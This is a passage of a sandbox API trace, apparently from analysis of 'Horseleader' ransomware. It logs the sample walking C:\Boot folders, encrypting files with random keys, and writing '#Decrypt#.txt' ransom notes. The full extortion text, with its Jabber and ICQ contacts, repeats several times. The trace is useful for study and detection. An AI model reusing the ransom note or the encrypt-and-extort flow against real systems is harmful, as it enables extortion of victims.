ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, 
dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.744] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.744] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\#Decrypt#.txt") returned 31 [0124.745] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\#Decrypt#.txt" (normalized: "c:\\boot\\nl-nl\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.745] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0124.745] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0124.747] lstrlenA (lpString="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") returned 1368 [0124.747] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.747] CloseHandle (hObject=0x1dc) returned 1 [0124.749] GetProcessHeap () returned 0x780000 [0124.749] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.749] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0124.749] lstrcmpiW (lpString1="pl-PL", lpString2="Windows") returned -1 [0124.749] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0124.749] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0124.749] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0124.749] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\pl-PL", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.750] GetProcessHeap () returned 0x780000 [0124.750] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.750] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\*") returned 19 [0124.750] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.751] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0124.751] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\.") returned 19 [0124.751] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.751] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.751] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.751] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\..") returned 20 [0124.752] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.752] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0124.752] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.752] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.752] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0124.752] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.752] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0124.753] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.753] lstrlenW (lpString=".testttjffg") returned 11 [0124.753] StrStrW (lpFirst="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.753] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.753] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.753] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.826] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, 
ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.827] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.827] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\#Decrypt#.txt") returned 31 [0124.827] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\#Decrypt#.txt" (normalized: "c:\\boot\\pl-pl\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.828] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0124.828] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0124.830] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0124.830] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.830] CloseHandle (hObject=0x1dc) returned 1 [0124.830] 
GetProcessHeap () returned 0x780000 [0124.830] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.831] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0124.831] lstrcmpiW (lpString1="pt-BR", lpString2="Windows") returned -1 [0124.831] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0124.831] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0124.831] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0124.831] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\pt-BR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.832] GetProcessHeap () returned 0x780000 [0124.832] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.832] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\*") returned 19 [0124.832] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.833] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 
[0124.833] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\.") returned 19 [0124.833] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0124.833] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0124.833] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0124.833] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\..") returned 20 [0124.834] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0124.834] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0124.834] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0124.834] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0124.834] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0124.834] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0124.834] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 
[0124.834] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0124.835] lstrlenW (lpString=".testttjffg") returned 11 [0124.835] StrStrW (lpFirst="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0124.835] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0124.835] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0124.835] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.835] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0124.836] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0124.836] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\#Decrypt#.txt") returned 31 [0124.836] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\#Decrypt#.txt" (normalized: "c:\\boot\\pt-br\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0124.837] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite 
to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0124.837] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0124.838] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0124.838] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0124.839] CloseHandle (hObject=0x1dc) returned 1 [0124.839] 
GetProcessHeap () returned 0x780000 [0124.839] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0124.839] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0124.839] lstrcmpiW (lpString1="pt-PT", lpString2="Windows") returned -1 [0124.839] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0124.839] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0124.840] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0124.840] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\pt-PT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0124.840] GetProcessHeap () returned 0x780000 [0124.840] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0124.840] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\*") returned 19 [0124.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0124.841] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 
